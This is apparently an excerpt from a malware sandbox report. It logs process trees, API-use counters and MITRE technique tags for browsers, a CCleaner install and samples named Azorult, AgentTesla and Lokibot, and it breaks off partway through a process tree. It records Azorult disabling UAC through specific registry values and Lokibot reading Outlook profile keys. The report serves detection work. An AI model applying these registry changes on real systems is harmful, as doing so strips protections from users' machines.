Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1644	CCleaner64.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
1644	CCleaner64.exe
884	ButterflyOnDesktop.exe
884	ButterflyOnDesktop.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe

Suspicious use of SetWindowsHookEx 46 IoCs

pid	Process
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4896	CCleaner64.exe
1884	CCUpdate.exe
4628	ccsetup622.exe
1552	CCUpdate.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
1644	CCleaner64.exe
2120	CCleaner64.exe
1644	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
6120	identity_helper.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
1644	CCleaner64.exe
1644	CCleaner64.exe
1644	CCleaner64.exe
5792	AgentTesla.exe
4744	Azorult.exe
3216	wini.exe
4224	winit.exe
2056	rutserv.exe
5536	rutserv.exe
4884	rutserv.exe
1500	rutserv.exe
2928	Azorult.exe
6124	cheat.exe
5236	taskhost.exe
4580	P.exe
4828	ink.exe
2896	R8.exe
1532	winlogon.exe
5724	taskhostw.exe
340	winlogon.exe
4244	OpenWith.exe
8168	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3768 wrote to memory of 5096	3768	chrome.exe	85
PID 3768 wrote to memory of 5096	3768	chrome.exe	85
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 3024	3768	chrome.exe	86
PID 3768 wrote to memory of 2404	3768	chrome.exe	87
PID 3768 wrote to memory of 2404	3768	chrome.exe	87
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88
PID 3768 wrote to memory of 1384	3768	chrome.exe	88

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4828	attrib.exe
1852	attrib.exe
4244	attrib.exe
4000	attrib.exe
3048	attrib.exe
6044	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Lokibot.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Lokibot.exe

C:\Users\Admin\AppData\Local\Temp\advbattoexeconverter.exe
"C:\Users\Admin\AppData\Local\Temp\advbattoexeconverter.exe"
1⤵
- Loads dropped DLL
PID:964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaecccab58,0x7ffaecccab68,0x7ffaecccab78
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1504 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:2
  2⤵
  PID:3024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2196 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:5000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:2272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4216 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3804 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:3348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:3552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:4084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:4680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4452 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:3560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4996 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:4104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3968 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4548 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:1424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3312 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4344 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:2764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5248 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:1
  2⤵
  PID:4084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5652 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:4216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3324 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:1220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2652 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2572 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:8
  2⤵
  PID:2416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2600 --field-trial-handle=1764,i,3751103749327065436,9064108439678756686,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1276

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4524

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1600

C:\Users\Admin\Downloads\ccsetup622.exe
"C:\Users\Admin\Downloads\ccsetup622.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4628
- C:\Program Files\CCleaner\CCleaner64.exe
  "C:\Program Files\CCleaner\CCleaner64.exe" /createSkipUAC
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Drops file in Windows directory
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4896
- C:\Program Files\CCleaner\CCUpdate.exe
  "C:\Program Files\CCleaner\CCUpdate.exe" /reg
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:1884
- - C:\Program Files\CCleaner\CCUpdate.exe
    CCUpdate.exe /emupdater /applydll "C:\Program Files\CCleaner\Setup\1bff2fdd-36fb-4520-9a0f-e2b7e17ff828.dll"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of SetWindowsHookEx
    PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ccleaner.com/go/app_releasenotes?p=1&v=&l=1033&b=1&a=0
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffad9193cb8,0x7ffad9193cc8,0x7ffad9193cd8
    3⤵
    PID:3928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2
    3⤵
    PID:4080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 /prefetch:3
    3⤵
    PID:196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
    3⤵
    PID:4412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    PID:2036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
    3⤵
    PID:2136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
    3⤵
    PID:2040
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
    3⤵
    PID:3108
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
